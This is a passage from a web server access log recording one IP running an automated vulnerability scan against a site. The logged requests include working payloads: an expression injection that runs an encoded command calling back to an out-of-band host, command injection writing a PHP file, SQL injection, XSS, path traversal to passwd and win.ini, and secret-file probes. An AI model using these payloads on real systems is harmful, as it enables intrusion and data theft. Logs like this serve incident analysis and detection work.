x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:23:20 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:11:23:28 -0400] "PUT /goform/AccessControl HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.8.22" 154.84.62.234 - - [24/Apr/2025:11:23:32 -0400] "GET /kqn6d.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:23:32 -0400] "GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22bnNsb29rdXAgZDA0cXI3aWo0cHExOWQ3NWs0OTBhY2hveWo3OTN5YW16Lm9hc3Qub25saW5l%22))) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:24:11 -0400] "POST /flash/addcrypted2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.9.16" 154.84.62.234 - - [24/Apr/2025:11:24:13 -0400] "GET /coda/frameset?cols=\"><frame%20src=\"javascript:alert(document.domain)\"> HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:24:31 -0400] "POST /wp-admin/admin-post.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - helpdeskIntegrationUser [24/Apr/2025:11:24:39 -0400] "GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:11:24:42 
-0400] "GET /wp-content/plugins/LayerSlider/assets/static/public/front.css HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0" 154.84.62.234 - - [24/Apr/2025:11:25:17 -0400] "GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:25:25 -0400] "GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.2.19" 154.84.62.234 - - [24/Apr/2025:11:25:34 -0400] "POST /save.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:11:25:37 -0400] "GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:11:25:42 -0400] "GET /?InternalDir=\\..\\..\\..\\..\\etc&InternalFile=passwd HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" 154.84.62.234 - - [24/Apr/2025:11:26:48 -0400] "POST /WSStatusEvents/EventHandler.asmx HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:27:05 -0400] "GET /streampipes-backend/api/v2/auth/settings HTTP/1.1" 200 0 "-" "2w9rfRhI92eODASuCRMGXnahhP8" 154.84.62.234 - - [24/Apr/2025:11:27:08 -0400] "POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:27:09 -0400] "GET /index.php?noAUTO=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like 
Gecko) Version/17.4 Safari/605.4.15" 154.84.62.234 - - [24/Apr/2025:11:27:40 -0400] "GET /desktop,/cgi-bin/remote_help-cgi/favicon.ico?type=sshd_tdc HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:27:41 -0400] "POST /cmd,/simZysh/register_main/setCookie HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.21" 154.84.62.234 - - [24/Apr/2025:11:28:23 -0400] "POST /admin/pr_monitor/getting_index_data.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0" 154.84.62.234 - - [24/Apr/2025:11:28:29 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:11:28:36 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:28:36 -0400] "GET /?p=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:29:06 -0400] "GET /login.rst HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:11:29:14 -0400] "GET /login.rst HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.4.22" 154.84.62.234 - - [24/Apr/2025:11:29:15 -0400] "POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:29:45 -0400] "GET /login.rst HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, 
like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:29:46 -0400] "POST /graphql HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:11:29:58 -0400] "GET /login.rst HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:11:30:57 -0400] "GET /file=web_assets/../config.json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0" 154.84.62.234 - - [24/Apr/2025:11:31:14 -0400] "POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:31:37 -0400] "GET /account/?user=1&tab=groups&group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5(999999999),0x7c,%20%22Version:%22,version()),13--+- HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.6.19" 154.84.62.234 - - [24/Apr/2025:11:31:37 -0400] "GET /cgi-bin/info.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:31:45 -0400] "GET /userLogin.asp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:32:04 -0400] "POST /apriso/portal/kiosk/querylogin.aspx HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" 154.84.62.234 - - [24/Apr/2025:11:32:29 -0400] "GET /process/groupe_save.php?saved=1&groupe_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C!--&nom=Project+New HTTP/1.1" 403 1242 "-" "Mozilla/5.0 
(Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:32:29 -0400] "POST /process/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:32:34 -0400] "GET /welcome HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/17.4" 154.84.62.234 - - [24/Apr/2025:11:32:50 -0400] "POST /Admin/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:32:55 -0400] "GET /Admin/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:33:33 -0400] "POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:11:34:02 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:34:06 -0400] "POST /settings HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1" 154.84.62.234 - - [24/Apr/2025:11:34:16 -0400] "POST /cgi-bin/cstecgi.cgi HTTP/1.1" 200 0 "https://mgrokokbet.id/page/index.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:11:34:19 -0400] "GET /hAl11e.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:11:34:22 -0400] "GET /global-protect/portal/images/2w9rfWF9MJTgAZMnXEss7ecZnD5.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 
(Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:34:26 -0400] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:11:34:28 -0400] "GET /global-protect/portal/images/2w9rfWF9MJTgAZMnXEss7ecZnD5.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:11:34:55 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:35:05 -0400] "POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:35:10 -0400] "GET /mailinspector/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:11:35:20 -0400] "GET /javadoc/releases/javadoc/1.0.0//raw/..%5c..%2f..%2f..%2f..%2f..%2freposilite.db HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:35:27 -0400] "POST /geoserver/wfs HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:35:48 -0400] "GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<\"+UNION+SELECT+SLEEP(6);--+-&type=c&response=accept HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/15.0.0 Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:11:35:46 -0400] "POST /include/file.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; 
Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:11:35:53 -0400] "POST /api/gen/clients/csharp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.4.20" 154.84.62.234 - - [24/Apr/2025:11:36:03 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:11:36:28 -0400] "GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:37:29 -0400] "GET /api/v1/settings HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.20" 154.84.62.234 - - [24/Apr/2025:11:37:54 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:11:37:56 -0400] "GET /realms/master/protocol/openid-connect/auth?client_id=security-admin-console&redirect_uri=https%3A%2F%2fmgrokokbet.id%2Fadmin%2Fmaster%2Fconsole%2F&state=1&response_mode=query&response_type=code&scope=openid&nonce=1&code_challenge_method=S256&code_challenge=wMYxCiAZ5DmiZvqD0h5G_9QwE7IDDFRojvORiaqiTto HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.26" 154.84.62.234 - - [24/Apr/2025:11:38:01 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:11:38:02 -0400] "POST /api/pull HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:11:38:07 -0400] "GET /controlloLogin.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; 
Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.6.16" 154.84.62.234 - - [24/Apr/2025:11:38:07 -0400] "POST /api/push HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:38:09 -0400] "POST /secserver/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; WebView/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362" 154.84.62.234 - - [24/Apr/2025:11:38:12 -0400] "GET /en-US/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:11:38:14 -0400] "POST /secserver/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:11:38:51 -0400] "POST /api/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:88.0) Gecko/20100101 Firefox/88.0" 154.84.62.234 - - [24/Apr/2025:11:39:16 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 154.84.62.234 - - [24/Apr/2025:11:39:28 -0400] "POST /uploadimage HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0" 154.84.62.234 - - [24/Apr/2025:11:39:41 -0400] "POST /as/wapi/vmp HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.44 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:39:47 -0400] "POST /as/wapi/vmp HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:11:39:58 -0400] "GET /wp-content/plugins/siteguard/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:11:41:03 -0400] "GET 
/api/webdav/chatgpt-next-web/backup.json?endpoint=https://webdav.yandex.com.d04qr7ij4pq19d75k490d1rgefd5eajzt.oast.online/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:41:07 -0400] "PUT /mdm/checkin HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/617.29 (KHTML, like Gecko) Version/17.7 Safari/617.29" 154.84.62.234 - - [24/Apr/2025:11:41:21 -0400] "POST /webtools/control/main/ProgramExport HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:41:22 -0400] "POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:70.0) Gecko/20100101 Firefox/70.0" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /info.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /cache/index.tpl.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.65" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /xmlrpc.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /bin/cron.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /phpinfo.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET 
/admin.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /adminer.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /php_info.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /xmlrpc.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /php-info.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /cpanel.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.2.19" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /admin.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/617.29 (KHTML, like Gecko) Version/17.7 Safari/617.29" 154.84.62.234 - - [24/Apr/2025:11:42:27 -0400] "GET /adminer.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:11:42:34 -0400] "GET /html/usr/share/doc/hostname/copyright%3f HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:11:42:40 -0400] "GET /wp-content/plugins/dokan-pro/changelog.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.23" 154.84.62.234 - - [24/Apr/2025:11:42:50 -0400] "POST /api/v1/livechat/sms-incoming/twilio HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:43:23 -0400] "GET /Login.aspx HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:11:44:34 -0400] "GET /login/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:11:44:40 -0400] "POST /api/v1/chart/data HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763" 154.84.62.234 - - [24/Apr/2025:11:45:14 -0400] "POST /client/api?command=samlSso HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:11:45:43 -0400] "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:46:19 -0400] "POST /management/export.php?filename=$(echo+'<\?php+echo+md5(8616);+?>'+>+idemzqxrensv.php)&type=pdf HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.2.19" 154.84.62.234 - - [24/Apr/2025:11:46:26 -0400] "GET /login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" 154.84.62.234 - - [24/Apr/2025:11:46:41 -0400] "GET /api/data HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:11:46:54 -0400] "GET /WebInterface/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:46:57 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0" 154.84.62.234 - - [24/Apr/2025:11:47:05 
-0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:11:47:08 -0400] "POST /openam/json/realms/root/authenticate HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0" 154.84.62.234 - - [24/Apr/2025:11:47:13 -0400] "GET /?es=optin&hash=eyJtZXNzYWdlX2lkIjowLCJjYW1wYWlnbl9pZCI6MCwiY29udGFjdF9pZCI6Int7Y29udGFjdF9pZH19IiwiZW1haWwiOiJ7e2VtYWlsfX0iLCJndWlkIjoiZGlid29sLXFhaWViZC1xdnJna3AtbGh5b3BtLXJteWZ6byIsImxpc3RfaWRzIjpbInNsZWVwKDMpIl0sImFjdGlvbiI6InN1YnNjcmliZSJ9 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:47:38 -0400] "GET / HTTP/1.1" 200 0 "-" 